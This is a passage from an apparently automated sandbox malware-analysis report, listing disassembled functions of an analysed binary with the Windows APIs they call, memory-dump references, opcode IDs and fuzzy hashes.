                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1464966427-0
                                                                                    • Opcode ID: 0989ca8f21a701431b104e24f8766958189a096acaa50b11dc1721f2d0a3d9bd
                                                                                    • Instruction ID: e8755cf037f864fcd39b8f9dd5fad6ce382b2500148145cd3db4323ed5078aa7
                                                                                    • Opcode Fuzzy Hash: 0989ca8f21a701431b104e24f8766958189a096acaa50b11dc1721f2d0a3d9bd
                                                                                    • Instruction Fuzzy Hash: 10F082310087A0FBCB2257B4A908BCB7BD16F5A331F048A49F1FD52196C37950A49B33
                                                                                    Function 00730E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00730E3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExecutionStateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2211380416-0
                                                                                    • Opcode ID: 713d43d28a49736ca257f09d5ff34c29aa39ebcd3b80d1324bc657f5ed069dab
                                                                                    • Instruction ID: 8dd55f9ec05724f23a8afb1fcaf761f60bbf81ceaa2ee73b3d973e555abe7fce
                                                                                    • Opcode Fuzzy Hash: 713d43d28a49736ca257f09d5ff34c29aa39ebcd3b80d1324bc657f5ed069dab
                                                                                    • Instruction Fuzzy Hash: 33D0C25170116896EE113328282D7FE260A8FC6311F0C0066F04A57283CE9C0C82A2B1
                                                                                    Function 0073A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                      • Part of subcall function 0073A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 1915507550-0
                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction ID: e947b35635b61c12c20aa5b3d3b0376d3b05018a52aed7c1a4acfe5e96d56d30
                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction Fuzzy Hash: 34D0C971214209FAFF426B618C17D6EBA99EB01340F048125B8C2D5193EAB9DD10A663
                                                                                    Function 0073DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00731B3E), ref: 0073DD92
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 897784432-0
                                                                                    • Opcode ID: f03dc89f88be6151b307e9a70c0b15180eb1a7f18f469c7f31c94ad493d61749
                                                                                    • Instruction ID: 1941cfb792a2b4ce7c5e81fae76d75f828cf92ca2d1ed4ac41712604acb2f212
                                                                                    • Opcode Fuzzy Hash: f03dc89f88be6151b307e9a70c0b15180eb1a7f18f469c7f31c94ad493d61749
                                                                                    • Instruction Fuzzy Hash: 53D09E31144300BAE6012B51CD0AF0B7AA2BB88F04F004654B385740B28AB69D31DB16
                                                                                    Function 0073E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DloadProtectSection.DELAYIMP ref: 0073E5E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DloadProtectSection
                                                                                    • String ID:
                                                                                    • API String ID: 2203082970-0
                                                                                    • Opcode ID: c317852db3e452386e53cd1a54a1360222494555db38c61e9a257c3e2b84f155
                                                                                    • Instruction ID: 245113295c581b73dc06970424cd07be52a6b5d1f7ab3569a0de64d4a6fb21a4
                                                                                    • Opcode Fuzzy Hash: c317852db3e452386e53cd1a54a1360222494555db38c61e9a257c3e2b84f155
                                                                                    • Instruction Fuzzy Hash: 80D0C9B45C0280DBF601EBA9DC4A7943268B364B05FE08101F145924D3DBAC4492A729
                                                                                    Function 007298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(000000FF,007297BE), ref: 007298C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 46ec6e24fe145085017fa479697ca07427334201afc6053eeaea5d43913d0bad
                                                                                    • Instruction ID: a7c36eec2fcb0cf396808d91f825bf3a3d05fdee9212f8bb55911e6f7209ed3d
                                                                                    • Opcode Fuzzy Hash: 46ec6e24fe145085017fa479697ca07427334201afc6053eeaea5d43913d0bad
                                                                                    • Instruction Fuzzy Hash: D7C01234400319868E248A34A8480997322AA537B6BBC8694C228890E1C32ACC87EB11
                                                                                    Function 0073E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 9556336af04ebf5926a85dd8c9c4e282a72391715b553f8036bfd1fb3043bac0
                                                                                    • Instruction ID: 0dd1916c392dde8c20eef9610e2328474ee46102469ef93c56c6005069f980e2
                                                                                    • Opcode Fuzzy Hash: 9556336af04ebf5926a85dd8c9c4e282a72391715b553f8036bfd1fb3043bac0
                                                                                    • Instruction Fuzzy Hash: 93B012E129D100FC3104A1081C06D77024DC0C0F11730D03FFC04E10C2D88C4D090533
                                                                                    Function 0073E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 447f96af7f49a2c7bf6232f64da9545bb88eed88187e3c6011962fcc82f46fd4
                                                                                    • Instruction ID: 8c0149d7093b269c874a0468c17bdec41ede440116b6249c838c1869864627b2
                                                                                    • Opcode Fuzzy Hash: 447f96af7f49a2c7bf6232f64da9545bb88eed88187e3c6011962fcc82f46fd4
                                                                                    • Instruction Fuzzy Hash: CFB012F129D100FC3104A1081C06D77024DC0C0F15730903EFC04D10C2D88C4F050533
                                                                                    Function 0073E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                    • Instruction ID: d676017cb514d46781c14cceb52345243d8f9aea8618019e8bf7f8fc1272e336
                                                                                    • Opcode Fuzzy Hash: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                    • Instruction Fuzzy Hash: E8B012E129D100FC310461081D06DB7024DC0C0F11730D03FF904E50C2D88C0D0E0533
                                                                                    Function 0073E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                    • Instruction ID: a26f6f8f0c7f9fc05cd758a056cf613eea9718dca0be05c69ebac4090bb49eb3
                                                                                    • Opcode Fuzzy Hash: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                    • Instruction Fuzzy Hash: 19A001E66AA252BD350962516D1ADBB025DC4C1B2AB30A52EF825A54C2AC88194A1872
                                                                                    Function 0073E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    Function 0073E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    Function 0073E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    Function 0073E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
